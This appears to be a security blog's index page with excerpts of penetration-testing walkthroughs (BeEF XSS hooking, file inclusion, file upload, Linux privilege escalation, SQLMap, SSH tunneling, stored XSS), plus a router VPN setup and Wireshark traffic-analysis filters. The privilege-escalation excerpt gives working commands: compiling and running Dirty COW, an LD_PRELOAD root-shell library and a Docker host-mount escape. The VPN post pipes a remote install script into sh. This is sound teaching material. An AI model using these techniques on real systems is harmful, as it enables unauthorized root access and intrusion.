Blog¶

8/1/24
4 min read

Draft

A Taste of the Browser Exploitation Framework (BeEF)

beef-chacho

What is BeEF?

BeEF (Browser Exploitation Framework) is a powerful tool that allows penetration testers to assess the security of browser clients. It uses XSS (Cross-Site Scripting) vulnerabilities to hook the target's browser and control it remotely.

Using BeEF to Exploit a XSS Vuln

This walkthrough will use BeEF to exploit the XSS vulnerability outlined here.

ATTACK_IP: 10.1.1.5
pfSense: 10.1.1.40
TARGET_IP (web server): 172.16.5.5

Configure and Start BeEF

1. View BeEF Configuration

$ less /opt/beef/config.yaml

Why?

Viewing the configuration file helps understand how BeEF is set up and configured, ensuring that it operates correctly within your network.

2. Modify the value for `permitted_hooking_subnet`

Value: 10.1.1.40/32

Why?

This setting restricts which IP addresses can be hooked by BeEF. It ensures only devices within the specified subnet are targeted, enhancing security by limiting exposure.

3. Modify the value for `permitted_ui_subnet`

Value: 127.0.0.1/32

Why?

This restricts access to the BeEF UI to the local machine, preventing unauthorized remote access to the control panel.

7/31/24
6 min read

Draft

File Inclusion Penetration Testing

A local file inclusion attack is like a guest at a party discovering an unlocked door to the host's private study. Once inside, they rummage through personal files and sensitive documents, taking advantage of the unlocked door to access information not meant for them.

fileInclusion-chacho

File inclusion vulnerabilities occur when a web application allows users to include files without proper validation. There are two types of file inclusion vulnerabilities: Local File Inclusion (LFI) and Remote File Inclusion (RFI).

Local File Inclusion (LFI): This vulnerability occurs when an attacker can include files that are already present on the server. It is typically exploited to read sensitive files such as configuration files, password files, and logs, which may contain valuable information.
Remote File Inclusion (RFI): This vulnerability occurs when an attacker can include files from remote servers. This can be used to execute malicious code hosted on an external server, potentially leading to a complete server compromise. RFI is often used when attackers do not have other means of access to the target server.

File inclusion vulnerabilities can be used for various purposes, including information disclosure, code execution, and privilege escalation.

Scenario: LFI

You have been tasked with pentesting a WordPress-based web application. Your goal is to identify any vulnerabilities and demonstrate how any findings could be exploited.

Step 1: Identifying Vulnerability

1. Reconnaissance and Enumeration

Use nmap, a network scanning tool, to perform a basic scan of the target:
```
nmap -sV -p 80,443 targetsite.com
```
This step is important to identify open ports and services running on the target server.
You discover that the application is hosted on a Linux server running Apache with WordPress.
Use WPScan, a WordPress vulnerability scanner, to identify plugins and potential vulnerabilities:
```
wpscan --url http://targetsite.com --enumerate p
```

7/31/24
8 min read

Draft

File Upload Penetration Testing

File Upload Vulnerabilities

fileupload-chacho

File upload vulnerabilities occur when a web application fails to properly validate or sanitize user-uploaded files. This can lead to various security issues, including remote code execution, server-side script execution, and unauthorized access to sensitive data. In this walkthrough, we will explore the process of identifying file upload vulnerabilities in a fictional web application called "PhotoShare," crafting a payload using msfvenom, testing the vulnerability, and presenting the findings in a pentest report.

Scenario

You have been tasked with pentesting "PhotoShare," a web application that allows users to upload and share photos. Your goal is to identify any file upload vulnerabilities and demonstrate how they can be exploited.

Step 1: Identifying Potential File Upload Vulnerability

1. Reconnaissance and Enumeration:

Use nmap, a network scanning tool, to perform a basic scan of the target:
```
nmap -sV -p 80,443 photoshare.com
```
Discover that the application is hosted on a Linux server running Apache.
Use DirBuster, a tool for brute-forcing web paths, to find hidden directories and files:
```
dirbuster -u http://photoshare.com -w /path/to/wordlist.txt
```
This helps in discovering directories that may not be publicly listed but could contain important endpoints.
Identify a file upload endpoint: http://photoshare.com/profile/upload.php.

2. Initial Testing:

Visit the upload page and try uploading various file types (e.g., test.jpg, test.png, test.php) to observe the server's response.
This is to check if the server is accepting different file formats without proper validation.
Notice that the server allows .php files to be uploaded without validation, indicating a potential vulnerability.
Continue reading

7/31/24
7 min read

Draft

Linux Privilege Escalation: Going Up!

privEsc-chacho

Privilege escalation on a Linux system is about exploiting specific vulnerabilities, misconfigurations, or oversights to gain elevated access — typically root. Even on a hardened system, subtle weaknesses like improperly configured SUID/SGID binaries, world-writable files, or unpatched kernel exploits can provide an attacker with a path to escalate privileges. The process involves thorough enumeration to uncover these opportunities, followed by precise exploitation, whether through command injection, leveraging environment variables, or exploiting vulnerable binaries. Mastery of these techniques allows you to move from basic user access to full system control, a crucial step in both offensive security and system hardening.

1. Initial Enumeration

System Info

uname -a

If you find that the system is running an outdated kernel version, such as 3.10.0-327, search for related exploits using searchsploit.

searchsploit 3.10.0-327

If an exploit (e.g. Dirty C0W (CVE-2016-5195)) is found, download and compile it.

searchsploit -m linux/local/40616.c
gcc -pthread 40616.c -o dirtyc0w
./dirtyc0w

Kernel Version

uname -r

If uname -r shows a kernel version with a known local exploit, search for it using searchsploit:

searchsploit <kernel_version>

For example, if the kernel is 2.6.32-431, search for relevant exploits.

searchsploit 2.6.32-431

Download and execute the exploit.

searchsploit -m linux/local/15285.c
gcc 15285.c -o exploit
./exploit

User & Group Info

id

If you are part of an uncommon or privileged group like docker or lxd, search for container escape techniques.

For Docker:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

whoami

If you're logged in as a low-privilege user but can see that you have sudo privileges without a password, you can escalate immediately:

sudo su

cat /etc/passwd

If you find a user with UID 0 but a non-standard shell or directory, investigate further by attempting to switch to that user:

su <username>

2. Environment Enumeration

Environment Variables

env

If you find an environment variable like LD_PRELOAD or PATH manipulated, create a malicious shared library to exploit LD_PRELOAD:

Create a malicious shared library:

// malicious.c
void _init() {
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

gcc -shared -o /tmp/malicious.so -fPIC malicious.c
export LD_PRELOAD=/tmp/malicious.so

7/31/24
3 min read

Draft

SQLi Penetration Testing

Introduction to the SQLi

SQL Injection (SQLi) is an attack that allows execution of arbitrary SQL queries on a database through a vulnerable web application. Imagine a nightclub where the bouncer's job is to verify the age of each guest to ensure they're over 21. Instead of checking IDs properly, the bouncer just glances at whatever is shown and lets everyone in, assuming it's valid. This lack of scrutiny allows individuals who are underage and/or have fake IDs to enter the club, potentially causing trouble.

In the case of SQL injection, the web application (bouncer) is supposed to validate and sanitize user inputs (IDs) to ensure only safe and legitimate queries (guests) interact with the database (club). However, if the application fails to properly check and sanitize these inputs, malicious actors (underage individuals) can inject harmful SQL code (fake IDs) into the query, gaining unauthorized access to sensitive data (entering the club) and potentially causing damage.

laxBouncer-chacho

This walkthrough demonstrates using SQLMap to exploit a vulnerable URL parameter on a MySQL-based website. Steps include confirming the vulnerability, enumerating databases, and extracting data from the "wordpress" database. The scenario highlights the impact of SQLi vulnerabilities, such as unauthorized data access, and concludes with preparing a pentest report to document findings and recommendations.

SQLMap: SQLi Scenario

Step 1: Identify the Target

Assess the security of a website, http://example.com. The target URL is http://example.com/products.php?id=1.

Step 2: Initial Reconnaissance

Use basic browser testing and tools like Burp Suite to determine if the id parameter in the URL might be vulnerable to SQL injection.

Step 3: Running SQLMap for SQL Injection

Use SQLMap to test and exploit the SQL injection vulnerability.

sqlmap -u "http://example.com/products.php?id=1" --dbms=mysql --batch --banner

Command Explanation

-u "http://example.com/products.php?id=1": Specifies the URL with the potential SQL injection point.
--dbms=mysql: Forces the backend database type to MySQL.
--batch: Runs in non-interactive mode, using default options.
--banner: Retrieves the database server's banner to confirm the database type and version.

7/31/24
4 min read

Draft

Understanding SSH Tunneling and Redirection

tunneling-chacho

Introduction

In penetration testing, gaining access to internal network resources often requires advanced techniques to bypass firewalls, NAT devices, and other security measures. SSH tunneling and redirection are powerful methods that allow penetration testers to navigate these obstacles. This article will explain these concepts, their real-world applications, and provide practical examples.

What is SSH Tunneling?

SSH tunneling, also known as SSH port forwarding, is a method of creating a secure, encrypted connection between a local and a remote computer through the SSH protocol. This technique can be used to forward traffic from one network port to another, effectively bypassing firewall restrictions and network segmentation.

Scenario

Imagine you are a penetration tester who has gained initial access to a target network through a compromised external server (Target1_IP). Your goal is to reach internal resources (Target2_IP and Target3_IP) and also provide a reverse connection back to your local machine for further exploitation. To achieve this, you will use an advanced SSH command that sets up multiple tunnels and optimizes connections.

The Command

ssh -o ControlMaster=yes -o ControlPath=/tmp/conn.sock -L 22222:Target2_IP:22 -L 8888:Target3_IP:80 -R 443:127.0.0.1:1234 root@Target1_IP

1. ControlMaster and ControlPath Options

-o ControlMaster=yes -o ControlPath=/tmp/conn.sock

7/31/24
1 min read

Draft

Windows Privilege Escalation: Movin' on Up!

privEsc-chacho

Previously, I wrote a bit about the process of kerberoasting and utilizing Bloodhound and other tools for Windows penetration testing. Because those topics are covered elsewhere, this one will cover different tools and techniques that were not in the kerberoasting post.

For this post, I am continuing an exploit that began from a XSS vulnerability and was exploited through BeEF. It picks up where the BeEf post left off with having just exploited the Windows box with a very unstable Windows shell.

Migrating Processes

The first step we want to do is get ourselves out of an unstable shell by migrating to a process owned by the user we're impersonating.

7/31/24
5 min read

Draft

Stored XSS

Imagine a library where anyone can write in a guestbook. A stored XSS attack is like someone writing a hidden, harmful message in the guestbook that, when read, causes the reader's pen to write down their personal details on a separate sheet that the attacker can access. The readers are unaware that their information is being stolen while they are simply interacting with what they believe to be a safe guestbook.

xss-chacho

Types of XSS

There are three main types of Cross-Site Scripting (XSS) vulnerabilities:

Stored XSS: Also known as persistent XSS, this type occurs when malicious script is permanently stored on the target server, such as in a database, message forum, or comment field. The script is executed every time a user accesses the affected content.
Reflected XSS: This type occurs when a malicious script is reflected off a web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. It is delivered to users via another route, such as an email or a web link.
DOM-Based XSS: This type occurs when the vulnerability exists in the client-side code rather than the server-side code. The payload is executed as a result of modifying the DOM environment in the victim's browser, causing client-side script to run differently.

Walkthrough Focus

The walkthrough provided is covering Stored XSS. In this scenario, the payload is injected into the Name parameter on the Contact page of the WordPress site using the "Participants Database" plugin. When this data is stored and subsequently displayed to users or administrators, the malicious script executes, demonstrating the persistent nature of stored XSS vulnerabilities.

Step 1: Initial Reconnaissance

Pick one.

with WPScan

wpscan --url https://targetwebdomain.com --enumerate p

Skip to Step 3.

with Metasploit WordPress Scanner

Start by opening up msfconsole and finding the WordPress Scanner.

msfconsole

search wordpress scanner

wordpress-scanner-searchResults

use auxiliary/scanner/http/wordpress_scanner

set rhosts www.targetwebdomain.com

run

Skip to Step 3.

with Burp Suite

Start by running the target domain, http://targetwebdomain.com, through Burp Suite to capture and analyze the traffic.

Configure Browser to Use Burp Suite Proxy:
- Set the browser's proxy settings to route traffic through Burp Suite (typically 127.0.0.1:8080).
- Scope the proxy to only be for the target domain.
  Continue reading

7/28/24
3 min read

Configure NordLynx on a Unifi Dream Machine

encrypted-chacho

VPN slowing you down? OpenVPN is fantastic for privacy, but if you need speed, it's not the best protocol option. Enter WireGuard: lightweight and fast. That's why NordVPN's NordLynx is built on WireGuard; it's a game-changer. Setting up a VPN client on an edge router, like the Unifi Dream Machine, allows the entire network traffic to benefit so great - let's do that! There's only one problem: NordVPN doesn't currently provide easy config files.

The solution: Generate the configuration on a Linux machine and use those details to set up NordLynx on your router. This guide will walk you through the process by first installing NordVPN on a debian-based Linux VM (Parrot Security OS) and then using that configuration to set up NordLynx on a Unifi Dream Machine.

Install NordVPN and WireGuard on a Linux Machine

sudo apt install wireguard curl
sh <(curl%20-sSf%20https://downloads.nordcdn.com/apps/linux/install.sh)

Initiate Login to NordVPN Account

nordvpn login

7/26/24
20 min read

Malicious Traffic Analysis

maltraffic-chacho

The following is a combination of notes, research, and knowledge acquired from a malicious traffic analysis course. The focus of this post is on identifying malicious activity in Wireshark. For basic Wireshark setup and tips for filtering, check here.

Note: A good rule of thumb in terms of physical requirements is that whatever the pcap size is, you should have four times that amount of RAM available.

Lifecycle: Reconnaissance

This includes discovery as well as scanning for hosts, fingerprinting, sevices, and network mapping.

TTL-OS Table

When you ping an ip address, the Operating System can sometimes be surmised by the TTL value. The table below is from this maintained website.

Device / OS	Version	Protocol	TTL
AIX		TCP	60
AIX		UDP	30
BSDI	3.2, 4.1	ICMP	255
Compa	BSD/OS 3.1 and 4.0	ICMP	255
Cisco		ICMP	64
DEC Pathworks		ICMP	254
Foundry	V5	TCP and UDP	30
FreeBSD	2.1R	ICMP	64
FreeBSD	3.4, 4.0	TCP and UDP	64
FreeBSD	5	ICMP	255
HP-UX	9.0x	ICMP	64
HP-UX	10.01	TCP and UDP	30
HP-UX	10.2	TCP and UDP	64
HP-UX	11	ICMP	255
Irix	11	ICMP	255
Irix	5.3	TCP	64
juniper	6.x	TCP and UDP	60
MPE/IX (HP)	6.5.3, 6.5.8	TCP and UDP	60
Linux		ICMP	255
Linux		ICMP	64
Linux	2.0.x kernel	ICMP	200
Linux	2.2.14 kernel	ICMP	64
Linux	2.4 kernel	ICMP	255
Linux	Red Hat 9	ICMP	255
MacOS/MacTCP	2.0.x	ICMP and TCP	64
MacOS/MacTCP	X (10.5.6)	TCP and UDP	60
NetBSD		ICMP	255
Netgear FVG318		ICMP and UDP	64
OpenBSD	2.6 & 2.7	ICMP	255
OpenVMS	07.01.2002	ICMP	255
OS/2	TCP/IP 3.0	ICMP	64
OSF/1	V3.2A	TCP	60
OSF/1	V3.2A	UDP	30
Solaris	2.5.1, 2.6, 2.7, 2.8	ICMP	255
Solaris	2.8	TCP	64
Stratus	TCP_OS	ICMP	255
Stratus	TCP_OS (14.2-)	TCP and UDP	30
Stratus	TCP_OS (14.3+)	TCP and UDP	64
SunOS	STCP	ICMP/TCP/UDP	60
SunOS	4.1.3/4.1.4	TCP and UDP	60
Ultrix	5.7	ICMP and TCP	255
VMS/Multinet	V4.1/V4.2A	TCP	60
VMS/TCPware	V4.1/V4.2A	UDP	30
VMS/Wollongong	V4.2 – 4.5	ICMP	255
VMS/UCX		TCP and UDP	64
Windows	1.1.1.1	TCP	128
Windows	1.1.1.1	UDP	30
Windows	for Workgroups	TCP and UDP	128
Windows	95	TCP and UDP	32
Windows	98	ICMP	32
Windows	98, 98 SE	ICMP	128
Windows	98	TCP	128
Windows	NT 3.51	TCP and UDP	32
Windows	NT 4.0	TCP and UDP	128
Windows	NT 4.0 SP5-		32
Windows	NT 4.0 SP6+		128
Windows	NT 4 WRKS SP 3, SP 6a	ICMP	128
Windows	NT 4 Server SP4	ICMP	128
Windows	ME	ICMP	128
Windows	2000 pro	ICMP/TCP/UDP	128
Windows	2000 family	ICMP	128
Windows	Server 2003		128
Windows	XP	ICMP/TCP/UDP	128
Windows	Vista	ICMP/TCP/UDP	128
Windows	7	ICMP/TCP/UDP	128
Windows	Server 2008	ICMP/TCP/UDP	128
Windows	10	ICMP/TCP/UDP	128

Display Anomalous TCP Flags

By applying the filter below, you will display packets with TCP flag combinations not included in the normal set, helping to identify potential anomalous activity.

Detect unusual TCP flag combinations:

tcp && (!(tcp.flags == 0x02 || tcp.flags == 0x12 || tcp.flags == 0x10 || tcp.flags == 0x01 || tcp.flags == 0x04 || tcp.flags == 0x18))